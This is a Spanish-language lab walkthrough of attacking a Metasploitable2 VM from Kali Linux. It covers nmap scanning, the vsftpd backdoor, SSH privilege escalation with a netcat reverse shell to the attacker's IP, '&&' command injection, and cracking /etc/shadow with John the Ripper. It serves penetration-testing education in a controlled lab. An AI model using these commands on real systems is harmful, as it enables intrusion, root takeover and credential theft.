Вы находитесь на странице: 1из 13

Actividad 1

Fingerprinting

1. Después de instalar metasploide2 y kali Linux debemos de configurar el puerto


de LAN de las 2 maquinas
2. Ya echo lo anterior, iniciamos las 2 máquinas colocamos sus usuarios y sus
respectivas contraseñas
3. Iniciamos el Terminal en ambas máquinas y escribimos IFCONFIG y
verificamos la IP este en la misma línea EJ: 192.168.100.2, 192.168.100.3
4. Como en esta imagen

5. Después corroborando lo anterior procedimos a escribir ej: (con tu ip) nmap –


sP 192.168.100.0/24
6. Esto es para hacer un barrido en la red y saber quiénes están conectados en la
red
7. en la imagen muestra el resultado del muestreo de la red, en mi caso la ip de la
máquina de metasploitable2 es 192.168.100.7

8. después colocamos el comando nmap –sS –sV 192.168.100.7 esto es para


ver qué servicios y puertos están abiertos
9.
Actividad 2
PUERTO 21 VSFTPD
En el puerto 21 tenemos corriendo vsftpd 2.3.4. Esta versión tiene un backdoor
(puerta trasera) que se introdujo en el archivo vsftpd-2.3.4.tar.gz el 30 de Junio
de 2011 y se retiró el 3 de Julio del mismo año después de que un usuario
avisara al autor.
Para explotarlo, utilizaremos un exploit disponible en metasploit.

Aquí vemos una caputura de la shell obtenida con permisos root.

PUERTO 22 SSH
En el puerto 22 está corriendo OpenSSH 4.7p1. Si pasamos un escáner de
vulnerabilidades como nessus u openvas, una de las vulnerabilidades nos indica
que este servicio tiene los credenciales por defecto, siendo estos la palabra
"user" tanto para el usuario como para la contraseña.

Asique aprovechamos ésta vulnerabilidad para conectarnos. Una vez


conectados, vamos a intentar obtener permisos root, para ello nos fijamos en la
version del kernel de linux.
Al ser una versión antigua, existen exploits para escalar privilegios localmente.

Descargamos el exoploit a nuestra máquina, para subirlo a la víctima,


utilizaremos el apache. Metemos el archivo descargado en la
carpeta/var/www/html/ y arrancamos apache.

Ahora desde la consola con la conexión ssh, descargamos el exploit con el


comando wget y lo compilamos.

El siguiente paso es ver el PID del proceso que utiliza la tarjeta de red para
ejecutar nuestro exploit en el mismo proceso.
En este caso es el número 2701. Antes de ejecutar el exploit, vamos a crear un
payload que conecte mediante netcat con nuestra máquina Kali cuando
ejecutemos el exploit, obteniendo asi nuestra shell con privilegios root.
Creamos un archivo llamado "run" en la misma carpeta que el exploit con el
siguiente contenido:

#!/bin/bash
/bin/netcat -e /bin/bash 192.168.0.190 4444

Ponemos la ip de Kali y el puerto que queramos.

Lo siguiente es abrir una nueva terminal en Kali y poner el netcat a la escucha


en el mismo puerto que pusimos anteriormente en el payload: nc -l -p 4444.

Ya tenemos todo preparado, solo falta ejecutar el exploit (en el proceso


2701): ./8572 2701

Aquí tenemos una captura de la shell obtenida con privilegios root.

PUERTO 23 TELNET
Este puerto no tiene misterio ninguno puesto que nada mas conectarnos, nos
aparece el siguiente mensaje.
Nos dice usuario y contraseña para el login, además el usuario msfadmin tiene
permisos root asique no hay nada mas que hacer.

PUERTO 25 SMTP
Esta vez vamos a utilizar un auxiliar de metasploit para obtener nombres de
usuario.

No podemos hacer mucho mas en este puerto.


Hasta aquí la primera entrega, espero os guste y sea de ayuda. Recordar que está
hecho solo con fines educativos y en un entorno controlado, no nos hacemos
responsables de su mal uso.
TWIKI

La primera aplicación que aparece es Twiki. Se trata de un gestor de contenidos tipo


wiki, escrito en Perl y con licencia GPL. Soporta extensiones para acceso a base de
datos, diagramas, hojas de calculo, seguimiento de proyectos y muchas otras
posibilidades.
Éste tiene una vulnerabilidad que podemos explotar con Metasploit.
Obtendremos una shell sin privilegios. Para escalar privilegios utilizaremos el mismo
exploit que usamos en el puerto 22 (SSH), en la primera parte de ésta guía.

Command Execution

Nos aparece una pantalla en la que podemos hacer un ping a la IP indicada. Pero
además podemos ejecutar mas comandos con la siguiente sintaxis: IP&&COMANDO.

Ejemplo: 127.0.0.1&&pwd
En la captura vemos como responde al ping y al comando pwd. Ahora ya depende de
nuestra imaginación y los permisos que tengamos.

Actividad 3
Usare una vulnerabilidad para conseguir usuarios y contraseñas
Y usare una aplicación atacante llamada John The Ripper

1. Debemos de tener las 2 máquinas (metasploidtable2 y kali Linux)


iniciadas y en la misma red
2. Nos dirigimos a kali Linux y abrimos la aplicación de METASPLOID
3.

4. Espere a que se inicialicen los servicios dura entre 2-4 minutos depende
su configuración
5. Abrimos el terminal en kali Linux y colocamos el comando nmap –sS –
sV 192.168.100.7 (en este caso la ip de metasploitable2 en mi red es de
192.168.100.7) esto nos mostrara los servicios vulnerables
6. Usaremos esta que es la vulnerabilidad que nos deja acceder al espacio de las
contraseñas

7. Luego en la Aplicación METASPLOID colocamos: search vsftpd (que es el


nombre del el servidor a atacar)
8. Aca vemos que ya termino es proceso de búsqueda y luego de que termine
escribimos use y luego copiamos el texto que esta en la flecha verde, tendría que
quedar como esta en la flecha azul

9. Ya estaremos dento del exploit luego damos show options


10. Nos desplegara las opciones luego escribimos set RHOST 192.168.100.7
11. Luego escribimos show payloads y luego escribimos exploit
12. Procedemos a descargar john the riper desde este enlace
http://www.openwall.com/john/j/john-1.8.0.tar.gz
13. En el terminal de kali Linux activaremos el servidor apache escribimos: service
apache2 start y se nos iniciara el servidor apache colocamos la dirección en el
navegador 127.0.0.1
14. Copiamos el archivo descargado en esta direecion /var/www/tolos
15. Ahora vamos a la aplicación de METASPLOID escribimos wget
http://192.168.100.6/tools/’’aca va el nombre del archivo de jhon the riper que
descargaron’’ (maquina atacantea)
16. Para instalar jhon the ripper en la maquina infectada escrbimos cd (el nombre
del archivo descargado ‘’jhon the ripper’’)
17. Luego escrimos cd src
18.Escribimos MAKE GENERATE
19. Escribimos cd .. (para devolvernos) y luego cd run
20. Escribimos ./unsshadow /etc/passwd /etc/shadow > (el nombre que
quieran).txt
21. Luego escribimos ./jhon (el nombre que hayan puesto).txt
22. Si lo hicieron bien optendran algo parecido a esto que son los usuarios y
contraseñas de metasploiteable2 con la que entramos un ejemplo es
MSFADMIN

Вам также может понравиться